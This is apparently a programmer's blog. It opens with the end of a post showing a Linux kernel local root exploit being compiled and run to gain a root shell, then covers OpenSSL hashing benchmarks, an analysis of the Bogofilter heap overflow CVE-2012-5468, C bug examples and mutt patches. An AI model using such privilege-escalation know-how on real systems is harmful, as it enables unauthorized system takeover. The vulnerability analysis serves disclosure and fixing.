All done! Compiling might be difficult, since you need Kernel struct

definitions. I used -idirafter and my Kernel headers.

$ make

gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c

$ ./kex

# id

uid=0(root) gid=0(root) groups=0(root)



Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:

But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…

Update: The Protection Fault occurs when first following a bogus function pointer. After that, the exploit can no longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)

Concurrent Hashing is an Embarrassingly Parallel Problem

So I was reading some rather not so clever code today. I had a gut

feeling something was wrong with the code, since I had never seen an

idiom like that. A server that does a little hash calculation with

lots of threads – and the function that computes the hash had a

peculiar feature: Its entire body was wrapped by a mutex lock/unlock

clause of a function-static mutex PTHREAD_MUTEX_INITIALIZER, like

this:

static EVP_MD_CTX mdctx;

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static unsigned char first = 1;

pthread_mutex_lock(&lock);

if (first) {

EVP_MD_CTX_init(&mdctx);

first = 0;

}

/* the actual hash computation using &mdctx */

pthread_mutex_unlock(&lock);

In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.

The computation code inside the function looks roughly like this:

if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||

!EVP_DigestUpdate(&mdctx, input, inputlen) ||

!EVP_DigestFinal(&mdctx, hash, &md_len)) {

ERR_print_errors_fp(stderr);

exit(-1);

}

This is the typical OpenSSL pattern: You tell it to initialize mdctx to

compute the SHA256 digest, then you “update” the digest (i.e., you

feed it some bytes) and then you tell it to finish, storing the

resulting hash in hash. If any of these functions fails, the OpenSSL

error is printed.

So the lock mutex really only protects the mdctx (short for

‘message digest context’). And my gut feeling was that re-initializing the

context all the time (i.e. copying stuff around) is much cheaper

than synchronizing all the hash operations (i.e., having one stupid

bottleneck).

To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)

First, I have to create a dataset. In order for it to be the same all

the time, I use rand_r() with a hard-coded seed, so that over all

iterations, the random data set is actually equivalent:

#define DATANUM 10000000

#define DATASIZE 16

static char data[DATANUM][DATASIZE];

void init_data(void)

{

int n, i;

unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */

char alpha[] = "abcdefghijklmnopqrstuvwxyz";

for(n = 0; n < DATANUM; n++)

for(i = 0; i < DATASIZE; i++)

data[n][i] = alpha[rand_r(&seedp) % 26];

}

Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.

Then I start num threads on equally-sized slices of data while recording and

printing out timing statistics:

void hash_all(int num)

{

int i;

pthread_t *t;

struct fromto *ft;

struct timespec start, end;

double delta;

clock_gettime(CLOCK_MONOTONIC, &start);

t = malloc(num * sizeof *t);

for(i = 0; i < num; i++) {

ft = malloc(sizeof(struct fromto));

ft->from = i * (DATANUM/num);

ft->to = (i == num - 1) ?

DATANUM : (i+1) * (DATANUM/num); /* last slice also takes the remainder */

pthread_create(&t[i], NULL, hash_slice, ft);

}

for(i = 0; i < num; i++)

pthread_join(t[i], NULL);

clock_gettime(CLOCK_MONOTONIC, &end);

delta = end.tv_sec - start.tv_sec;

delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;

printf("%d threads: %lu hashes/s, total = %.3fs\n",

num, (unsigned long) (DATANUM / delta), delta);

free(t);

sleep(1);

}

Each thread runs the hash_slice() function, which linearly iterates

over the slice and calls hash_one(n) for each entry. With

preprocessor macros, I define two versions of this function:

void hash_one(int num)

{

int i;

unsigned char hash[EVP_MAX_MD_SIZE];

unsigned int md_len;

#ifdef LOCK_STATIC_EVP_MD_CTX

static EVP_MD_CTX mdctx;

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static unsigned char first = 1;

pthread_mutex_lock(&lock);

if (first) {

EVP_MD_CTX_init(&mdctx);

first = 0;

}

#else

EVP_MD_CTX mdctx;

EVP_MD_CTX_init(&mdctx);

#endif

/* the actual hashing from above */

#ifdef LOCK_STATIC_EVP_MD_CTX

pthread_mutex_unlock(&lock);

#endif

return;

}
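The hash_slice() function and struct fromto mentioned above are not shown here. A minimal sketch of how they might look follows; the field types, the half-open range and the free() of the descriptor are my assumptions, and hash_one() is replaced by a counting stub so that the snippet runs without OpenSSL.

```c
#include <assert.h>
#include <stdlib.h>

/* Assumed layout: half-open range [from, to) of indices into data[]. */
struct fromto {
    int from;
    int to;
};

/* Stand-in for the real hash_one(): only counts calls. The counter is not
 * thread-safe and exists purely for this single-threaded demonstration. */
static long hashed;

void hash_one(int num)
{
    (void) num;
    hashed++;
}

/* Thread entry point: hash every entry of the slice, then release the
 * descriptor that hash_all() allocated with malloc(). */
void *hash_slice(void *arg)
{
    struct fromto *ft = arg;
    int n;

    for (n = ft->from; n < ft->to; n++)
        hash_one(n);

    free(ft);
    return NULL;
}
```

Since every thread only touches its own slice and its own descriptor, no locking is needed at this level. The only shared state in the locked variant is the static mdctx inside hash_one().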

The Makefile produces two binaries:

$ make

gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c

gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c

… and the result is as expected. On my Intel i7-2620M quadcore:

$ ./speedtest-copied

1 threads: 1999113 hashes/s, total = 5.002s

2 threads: 3443722 hashes/s, total = 2.904s

4 threads: 3709510 hashes/s, total = 2.696s

8 threads: 3665865 hashes/s, total = 2.728s

12 threads: 3650451 hashes/s, total = 2.739s

24 threads: 3642619 hashes/s, total = 2.745s

$ ./speedtest-locked

1 threads: 2013590 hashes/s, total = 4.966s

2 threads: 857542 hashes/s, total = 11.661s

4 threads: 631336 hashes/s, total = 15.839s

8 threads: 932238 hashes/s, total = 10.727s

12 threads: 850431 hashes/s, total = 11.759s

24 threads: 802501 hashes/s, total = 12.461s

And on an Intel Xeon X5650 24 core machine:

$ ./speedtest-copied

1 threads: 1564546 hashes/s, total = 6.392s

2 threads: 1973912 hashes/s, total = 5.066s

4 threads: 3821067 hashes/s, total = 2.617s

8 threads: 5096136 hashes/s, total = 1.962s

12 threads: 5849133 hashes/s, total = 1.710s

24 threads: 7467990 hashes/s, total = 1.339s

$ ./speedtest-locked

1 threads: 1481025 hashes/s, total = 6.752s

2 threads: 701797 hashes/s, total = 14.249s

4 threads: 338231 hashes/s, total = 29.566s

8 threads: 318873 hashes/s, total = 31.360s

12 threads: 402054 hashes/s, total = 24.872s

24 threads: 304193 hashes/s, total = 32.874s

So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: all the mutex waiting slows the program down so much that you’d be better off using a single thread.

Rule of thumb: If you don’t have a good argument for making an application multithreaded, simply don’t go to the extra effort of implementing it in the first place.

Details on CVE-2012-5468

In mid-2010 I found a heap corruption in Bogofilter which led to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so as of yesterday there’s a new Bogofilter release, thanks to the maintainers. (Neither of the bugs has much potential for exploitation, for different reasons.)

I want to shed some light on the details of the new CVE-2012-5468 here: It’s a very subtle bug that arises from the error handling of the character set conversion library iconv.

The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:

Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.

The problematic code doesn’t look problematic at first glance. Nor at second glance. Take a look yourself.

The version here is abridged for brevity: it converts from inbuf to outbuf, handling possible iconv failures.

count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);

if (count == (size_t)(-1)) {

int err = errno;

switch (err) {

case EILSEQ: /* invalid multibyte sequence */

case EINVAL: /* incomplete multibyte sequence */

if (!replace_nonascii_characters)

*outbuf = *inbuf;

else

*outbuf = '?';

/* update counts and pointers */

inbytesleft -= 1;

outbytesleft -= 1;

inbuf += 1;

outbuf += 1;

break;

case E2BIG: /* output buffer has no more room */

/* TODO: Provide proper handling of E2BIG */

done = true;

break;

default:

break;

}

}

The iconv API is simple and straightforward: You pass a handle

(which among other things contains the source and destination

character set; it is called xd here), and two buffers and modifiable

integers for the input and output, respectively. (Usually, when

transcoding, the function reads one symbol from the source, converts

it to another character set, and then “drains” the input buffer by

decreasing inbytesleft by the number of bytes that made up the

source symbol. Then, the output length is checked, and if the target

symbol fits, it is appended and the outbytesleft integer is

decreased by how much space the symbol used.)

The API function returns -1 in case of an error.

The Bogofilter code contains a copy&paste of the error cases from the iconv(3)

man page. If you read the libiconv source

carefully,

you’ll find that …

/* Case 2: not enough bytes available to detect anything */

errno = EINVAL;

comes before

/* Case 4: k bytes read, making up a wide character */

if (outleft == 0) {

cd->istate = last_istate;

errno = E2BIG;

...

}

So the “certain pathological cases” the SA talks about are met if a

substantially large chunk of data makes iconv return -1, because

this chunk just happens to end in an incomplete multibyte sequence.

But at that point you have no guarantee from the library that your

output buffer can take any more bytes. Appending that character or a

? sign causes an out-of-bounds write. (This is really subtle. I

don’t blame anyone for not noticing this, although sanity checks – if

need be via assert(outbytesleft > 0) – are always in order when

you do complicated modify-string-on-copy stuff.) Additionally,

outbytesleft will be decreased to -1 (it is a size_t, so it actually wraps around to a huge value) and thus even a later check for outbytesleft == 0 will come out false.

Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.
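To illustrate the idea behind the fix, here is a minimal sketch of the EILSEQ/EINVAL branch with the missing bounds check. The helper skip_bad_byte() and its parameter names are made up for this post; this is not the actual Bogofilter patch:

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical helper (not from Bogofilter): copy or replace one
 * undecodable input byte, but only if the output buffer has room.
 * Returns false if nothing was written; the caller should then treat
 * the situation like E2BIG and stop or enlarge the buffer. */
bool skip_bad_byte(char **inbuf, size_t *inbytesleft,
                   char **outbuf, size_t *outbytesleft,
                   bool replace)
{
    if (*inbytesleft == 0 || *outbytesleft == 0)
        return false;

    **outbuf = replace ? '?' : **inbuf;

    /* update counts and pointers; neither counter can wrap around here */
    *inbuf += 1;
    *inbytesleft -= 1;
    *outbuf += 1;
    *outbytesleft -= 1;
    return true;
}
```

The important part is that the check happens before the write, so a full output buffer is reported instead of being overrun.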

How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.

C Programming Exam Fail

I just took an exam for the course Technische Informatik III, which was about operating systems and network communication. In the exercises throughout the semester, we had to program in C a lot. Naturally, one task in the exam was about interpreting what a C program does.

It was really simple: Listen on a UDP socket and print incoming packets

along with source address and port. The program looked somewhat like this (from

what I remember; also some things were done in a not so clever way on the exercise

sheet, and they had obfuscated the variable names to a non-descriptive

a, b, etc.):

#include <stdio.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <stdlib.h>

#include <error.h>

int main(int argc, char *argv[])

{

int sockfd;

struct sockaddr_in listen, incoming;

socklen_t incoming_len;

char buf[1024];

int len; /* of received data */

/* listen on 0.0.0.0:5000 */

listen.sin_family = AF_INET;

listen.sin_addr.s_addr = INADDR_ANY;

listen.sin_port = htons(5000);

if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)

perror("socket");

if(bind(sockfd, (struct sockaddr *) &listen, sizeof(listen)) == -1)

perror("bind");

while(1) {

len = recvfrom(sockfd, buf, 1024, 0, (struct sockaddr *) &incoming,

&incoming_len);

buf[len] = '\0';

printf("from %s:%d: \"%s\"\n", inet_ntoa(incoming.sin_addr),

ntohs(incoming.sin_port), buf);

}

}

I lol'd so hard when I saw this. It's a classic off-by-one error. (Can you spot it, too?)

If you want to store x bytes of data in a string, reserve x+1 bytes for the terminating NUL character. Here, if you send a message that is exactly 1024 bytes long (or longer, as it'll get truncated), buf[len] will actually be the 1025th byte, one past the end of buf. Which might just be anything.
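A corrected receive step might look like the following sketch. The helper name recv_string() is mine, not from the exam sheet; it leaves one byte for the terminator, initializes the address length before the call and checks the return value:

```c
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Hypothetical helper: receive one datagram into buf and NUL-terminate it.
 * Returns the number of bytes stored (without the terminator) or -1. */
ssize_t recv_string(int sockfd, char *buf, size_t bufsize,
                    struct sockaddr_in *from)
{
    socklen_t from_len = sizeof(*from); /* must hold the buffer size on entry */
    ssize_t len;

    if (bufsize == 0)
        return -1;

    /* ask for at most bufsize - 1 bytes so the terminator always fits */
    len = recvfrom(sockfd, buf, bufsize - 1, 0,
                   (struct sockaddr *) from, &from_len);
    if (len < 0)
        return -1;

    buf[len] = '\0';
    return len;
}
```

With a 1024 byte buffer this stores at most 1023 bytes of payload, so buf[len] is always inside the array.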

And those guys want to teach network and filesystem programming – hilarious. :-D

minimizing Linux filesystem cache effects

Last weekend I toyed around a bit and tried to write a shared object

library that can be used via LD_PRELOAD to minimize the effect a

program has on the Linux filesystem

cache.

Basically the use case is that you have a production system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I haven't tested yet whether this brings measurable improvements.
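One building block for this kind of thing is posix_fadvise() with POSIX_FADV_DONTNEED. The following is only a sketch under assumptions: drop_from_cache() is a hypothetical helper that a preloaded close() wrapper could call, and it is not necessarily how the library itself is structured:

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L
#endif
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: ask the kernel to drop the cached pages of fd.
 * Returns 0 on success or an errno value, like posix_fadvise() itself. */
int drop_from_cache(int fd)
{
    /* Dirty pages cannot be dropped, so try to flush them first.
     * fdatasync() can fail on fds that don't support it; that is
     * deliberately ignored in this sketch. */
    (void) fdatasync(fd);

    /* offset 0 and len 0 mean "the whole file" */
    return posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
}
```

Note that this is advice only: the kernel may keep pages around, and pages that were already cached before the program touched the file get dropped as well unless you track them separately.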

The coding was really fun and gave me yet another insight into how great the simple concept of file descriptors in UNIX is. (GNU software is tough, though: I got stuck once, and found help on Stack Overflow, which I had never used before.)

vlock and suspend to ram

I've had weird race conditions when using vlock together with s2ram. It

appears suspend to ram wants to switch

VTs, while

vlock hooks into the switch requests and explicitly disables them. So some of

the time, the machine would not suspend, while at other times, vlock wouldn't

be able to acquire the VT.

To solve this, I wrote a simple vlock plugin, which simply clears the lock

mechanism, writes mem to /sys/power/state and later reinstates the locking

mechanism. This plugin is called after all and new. Thus, the screen will

be locked properly before suspending.

Here's my suspend.c:

#include <stdio.h>

#include <unistd.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

/* Include this header file to make sure the types of the dependencies

* and hooks are correct. */

#include "vlock_plugin.h"

#include "../src/console_switch.h"

const char *succeeds[] = { "all", "new", NULL };

const char *depends[] = { "all", "new", NULL };

bool vlock_start(void __attribute__ ((__unused__)) **ctx_ptr)

{

int fd;

unlock_console_switch();

if((fd = open("/sys/power/state", O_WRONLY)) != -1) {

if(write(fd, "mem", 3) == -1)

perror("suspend: write");

close(fd);

}

lock_console_switch();

return true;

}

Simply paste it to the vlock modules folder, make suspend.so and copy it to

/usr/lib/vlock/modules. I now invoke it like this:

env VLOCK_PLUGINS="all new suspend" vlock

trying pthreads

Today I played around with POSIX threads a little. In an assignment, we have to implement a very, very simple webserver that does asynchronous I/O. Since it should perform well, I thought I'd not only serialize I/O, but also parallelize it.

So there's a boss that just accepts new inbound connections and appends the fds to a queue:

clientfd = accept(sockfd, (struct sockaddr *) &client, &client_len);

if(clientfd == -1)

error("accept");

new_request(clientfd);

The new_request function in turn appends it to a queue (of size

TODOS = 64), and emits a cond_new signal for possibly waiting

workers:

pthread_mutex_lock(&mutex);

while((todo_end + 1) % TODOS == todo_begin) {

fprintf(stderr, "[master] Queue is completely filled; waiting\n");

pthread_cond_wait(&cond_ready, &mutex);

}

fprintf(stderr, "[master] adding socket %d at position %d (begin=%d)\n",

clientfd, todo_end, todo_begin);

todo[todo_end] = clientfd;

todo_end = (todo_end + 1) % TODOS;

pthread_cond_signal(&cond_new);

pthread_mutex_unlock(&mutex);

The workers (there being 8) will just emit a cond_ready, possibly

wait until a cond_new is signalled, and then extract the first

client fd from the queue. After that, a simple function involving some

reads and writes will handle the communication on that fd.

pthread_mutex_lock(&mutex);

pthread_cond_signal(&cond_ready);

while(todo_end == todo_begin)

pthread_cond_wait(&cond_new, &mutex);

clientfd = todo[todo_begin];

todo_begin = (todo_begin + 1) % TODOS;

pthread_mutex_unlock(&mutex);

// handle communication on clientfd

(Full source is here: webserver.c.)

Now this works pretty well and is fairly easy. I'm not very experienced with threads, though, and I run into problems when I do massively parallel requests.

If I run ab, the Apache Benchmark tool with 10,000 requests, 1,000

concurrent, on the webserver it'll go up to 9000-something requests and

then lock up.

$ ab -n 10000 -c 1000 http://localhost:8080/index.html

...

Completed 8000 requests

Completed 9000 requests

apr_poll: The timeout specified has expired (70007)

Total of 9808 requests completed

The webserver is blocked; its last line of output reads like this:

[master] Queue is completely filled; waiting

If I attach strace while in this blocking state, I get this:

$ strace -fp `pidof ./webserver`

Process 21090 attached with 9 threads - interrupt to quit

[pid 21099] recvfrom(32, <unfinished ...>

[pid 21098] recvfrom(23, <unfinished ...>

[pid 21097] recvfrom(31, <unfinished ...>

[pid 21095] recvfrom(35, <unfinished ...>

[pid 21094] recvfrom(34, <unfinished ...>

[pid 21093] recvfrom(33, <unfinished ...>

[pid 21092] recvfrom(26, <unfinished ...>

[pid 21091] recvfrom(24, <unfinished ...>

[pid 21090] futex(0x6024e4, FUTEX_WAIT_PRIVATE, 55883, NULL

So the children seem to be starving on unfinished recv calls, while

the master thread waits for any children to work away the queue. (With

a queue size of 1024 and 200 workers I couldn't reproduce the

situation.)

How can one counteract this? Specify a timeout? Spawn workers on

demand? Set the listen() backlog argument to a low value? – or

is it all Apache Benchmark's fault? *confused*

mutt sidebar patch improvements

It is generally accepted as an almost universal truth that mutt sucks, but is the MUA that sucks less than all others. While people use either Vim or Emacs and fight about it, I hardly see any people fight about whether mutt is good or bad. There is, to my knowledge, no alternative worth mentioning.

Mutt dates back well into the mid-nineties. As you might imagine, with lots of contributors over the course of almost two decades, the code is rather messy.

When development had stalled for quite a while in the mid-2000s, a fork was attempted. While mutt-ng was quite popular for a while, most changes were incorporated back into mainline mutt at some point. (Ironically, the latest article in the mutt-ng development blog is from October 2006 and is titled "mutt-ng isn't dead!"). The development of main mutt gained some momentum again, triggered in large part by the contributions of the late Rocco Rutte.

I remember two big features that the original mutt authors just wouldn't integrate into mainline: The headercache patch and the sidebar patch. About the former I can't say anything, but lately I've been fixing the Sidebar patch in various places. (We use mutt at work and rely heavily on e-mail communication, so we'd like a bug-free user agent, naturally.)

When all the mutt forking went on about five years ago, I didn't know much about it. In retrospect, I see the people did a hell of a job. Long before mutt-ng was forked, Sven told me he and Mika met in Graz for several weeks to sift and sort through the available patches, intending to do a "super patch".

Mutt's code quality is arguably rather messy.

- There's a wild mix of 2-, 4- or 8-space indentation, often mixed with tabs (or vice versa)

- The user interface is completely tangled with application logic

- It uses curses directly. Go figure

On top of that, the Sidebar patch tries to make it even worse. Imagine this: mutt draws a mail from position (line=x,char=0) to the end of the line. Now the sidebar patch will introduce a left "margin", such that the sidebar can be drawn there. Thus, all code parts where a line is started from the leftmost character have to be rewritten to check if the sidebar is active and possibly start drawing at (line=x,char=20).

The sidebar code quality is a fringe case of bad code. Really, it sucks. However, there's no real way to "do it right", since original mutt never planned for a sidebar.

Who maintains the sidebar patch? – Not sure. There's a version at thomer.com, but he says:

July 20, 2006 I quit. Sadly, there seems to be no desire to absorb the sidebar patch into the main source tree.

The most up-to-date version is found at Lunar Linux. Last update is from mid-2009.

Debian offers a mutt-patched

package that includes the

sidebar patch, albeit in a different version than usually found 'round

the net. In short, this patch is a mess, too.

But since I made all the fixes, I decided to contact the package's maintainer, Antonio Radici. He promptly responded and said he'd happily fix all the issues, so I started by opening two bug reports. Nothing has happened since.

The patches run quite stably for my colleagues, so I think it's best to release them. Maybe someone else can use them. Please note that I have absolutely no interest in taking over any Sidebar patch maintenance. ;-)

For some of the patches I provide annotations. They all feature quite descriptive commit messages, and apply cleanly on top of the Debian mutt repository's master branch.

The first four patches are not by me, they are just the corresponding

patches from the debian/patches/ directory applied to have a

starting point.

- 0001-applying-debian-patches-mutt-patched-multiple-fcc.patch

- 0002-applying-debian-patches-mutt-patched-sidebar.patch

- 0003-applying-debian-patches-mutt-patched-sidebar-dotted.patch

- 0004-applying-debian-patches-mutt-patched-sidebar-sorted.patch

The first few patches fix rather trivial bugs.

- 0005-Fix-sidebar-compilation-errors-on-IRIX-systems.patch

- 0006-Fix-counting-of-flagged-mails-in-mboxes.patch

- 0007-Fix-various-sidebar-drawing-issues.patch

- 0008-Fix-setting-CurrBuffy-when-invoking-mutt-via-f.patch

Now come the performance critical patches. They are the real reason I was assigned the task to repair the sidebar:

This patch fixes a huge speed penalty. Previously, the sidebar would count the mails (and thus read through the whole mbox) every time that mtime > atime! This is just an incredible oversight by the developer and must have burned hundreds of millions of CPU cycles.

This introduces a member `sb_last_checked' to the BUFFY struct. It

will be set by `mh_buffy_update', `buffy_maildir_update' and

`buffy_mbox_update' when they count all the mails.

Mboxes only: `buffy_mbox_update' will not be run unless the

condition "sb_last_checked > mtime of the file" holds. This solves

a huge performance penalty you obtain with big mailboxes. The

`mx_open_mailbox' call with the M_PEEK flag will *reset* mtime and

atime to the values from before. Thus, you cannot rely on "mtime >

atime" to check whether or not to count new mail.
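The idea boils down to comparing the file's mtime with a timestamp you keep yourself. A stand-alone sketch of that check follows; mbox_needs_recount() is an illustrative name and not a function from the patch:

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>

/* Hypothetical helper: returns 1 if the mbox at path was modified at or
 * after last_checked and should be counted again, 0 if the old counts
 * are still good, and -1 if stat() fails. */
int mbox_needs_recount(const char *path, time_t last_checked)
{
    struct stat sb;

    if (stat(path, &sb) == -1)
        return -1;

    /* skip the expensive count only if we looked after the last change */
    return sb.st_mtime >= last_checked ? 1 : 0;
}
```

Because last_checked lives in the program and not in the file's metadata, it does not matter that atime and mtime get reset after peeking into the mailbox.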

Also, don't count mail if the sidebar is not active:

- 0010-only-count-mail-if-sidebar-is-active.patch

- 0011-buffy-check-msg_unread-if-sidebar-is-active.patch

- 0012-fix-sidebar-and-buffy-updates.patch

Then, I removed a lot of cruft and simply stupid design. Just consider one of the functions I removed:

-static int quick_log10(int n)

-{

- char string[32];

- sprintf(string, "%d", n);

- return strlen(string);

-}

That is just insane.

Now, customizing the sidebar format is simple, straight-forward and mutt-like:

sidebar_format

Format string for the sidebar. The sequences `%N', `%F' and

`%S' will be replaced by the number of new or flagged messages

or the total size of the mailbox. `%B' will be replaced with

the name of the mailbox. The `%!' sequence will be expanded to

`!' if there is one flagged message; to `!!' if there are two

flagged messages; and to `n!' for n flagged messages, n>2.
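To make the `%!' rule concrete, here is a small stand-alone sketch of the expansion. expand_flagged() is an illustrative name, not the function from the patch, and printing nothing for zero flagged messages is my assumption, since the description above doesn't cover that case:

```c
#include <stdio.h>

/* Hypothetical helper: write the expansion of `%!' for the given number
 * of flagged messages into buf. Returns what snprintf() returns. */
int expand_flagged(char *buf, size_t buflen, int flagged)
{
    if (flagged <= 0)
        return snprintf(buf, buflen, "%s", ""); /* assumption: empty for 0 */
    if (flagged == 1)
        return snprintf(buf, buflen, "!");
    if (flagged == 2)
        return snprintf(buf, buflen, "!!");
    return snprintf(buf, buflen, "%d!", flagged); /* e.g. "7!" */
}
```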

While investigating mutt's performance, one thing struck me: To decode a mail (eg. from Base64), mutt will create a temporary file and print the contents into it, later reading them back. This also happens for evaluating filters that determine coloring. For example,

color index black green '~b Julius'

will highlight mail containing my name in the body in bright green (this is tremendously useful). However, for displaying a message in the index, it will be decoded to a temporary file and later read back. This is just insane, and clearly a sign that the mutt authors wouldn't bother with dynamic memory allocation.

By chance I found a glibc-only function fmemopen(),

"fmemopen, open_memstream, open_wmemstream - open memory as stream".

From the commit message:

When searching the header or body for strings and the

`thorough_search' option is set, a temp file was created, parsed,

and then unlinked again. This is now done in memory using glibc's

open_memstream() and fmemopen() if they are available.

This makes mutt respond much more rapidly.
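For illustration, this is roughly what the write-then-read-back pattern looks like without a temp file. It is a stand-alone sketch and not code from the patch: search_in_memory() is a made-up name and fputs() stands in for mutt's decoder.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns 1 if any line of text contains needle,
 * 0 if not, -1 on error. */
int search_in_memory(const char *text, const char *needle)
{
    char *mem = NULL;
    size_t memlen = 0;
    char line[1024];
    int found = 0;
    FILE *out, *in;

    /* "write the decoded mail": the stream grows a malloc()ed buffer */
    out = open_memstream(&mem, &memlen);
    if (out == NULL)
        return -1;
    fputs(text, out);
    if (fclose(out) != 0) {     /* mem and memlen are final after fclose() */
        free(mem);
        return -1;
    }
    if (memlen == 0) {          /* some fmemopen() versions reject size 0 */
        free(mem);
        return 0;
    }

    /* "read it back": wrap the same buffer in a read-only stream */
    in = fmemopen(mem, memlen, "r");
    if (in == NULL) {
        free(mem);
        return -1;
    }
    while (!found && fgets(line, sizeof line, in) != NULL)
        if (strstr(line, needle) != NULL)
            found = 1;

    fclose(in);
    free(mem);
    return found;
}
```

Code that expects a FILE * keeps working unchanged, which is why this fits so easily into an old code base.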

Finally, there are some patches that fix various other issues; see the commit messages for details.

- 0016-Bugfix-use-realpath-on-initial-folder.patch

- 0017-Sidebar-Copy-numbers-before-leaving-mailbox.patch

- 0018-Fix-Buffy-Sidebar-and-mail_check_recent-issues.patch

- 0019-Copy-number-of-flagged-messages-when-leaving-mbox.patch

There you go. I appreciate any comments or further improvements.

Update 1: The original author contacted me. He told me he's written most of the code in a single sitting late at night. ;-)

Update 2: The 16th patch will make mutt crash when you compile it with -D_FORTIFY_SOURCE=2. There's a fix:

0020-use-PATH_MAX-instead-of-_POSIX_PATH_MAX-when-realpat.patch (thanks, Jakob!)

Update 3: Terry Chan contacted me. All my patches are now part of the Lunar Linux Sidebar Patch.

Update 4: The 15th patch that uses open_memstream uncovered a bug in glibc. See

here and

here.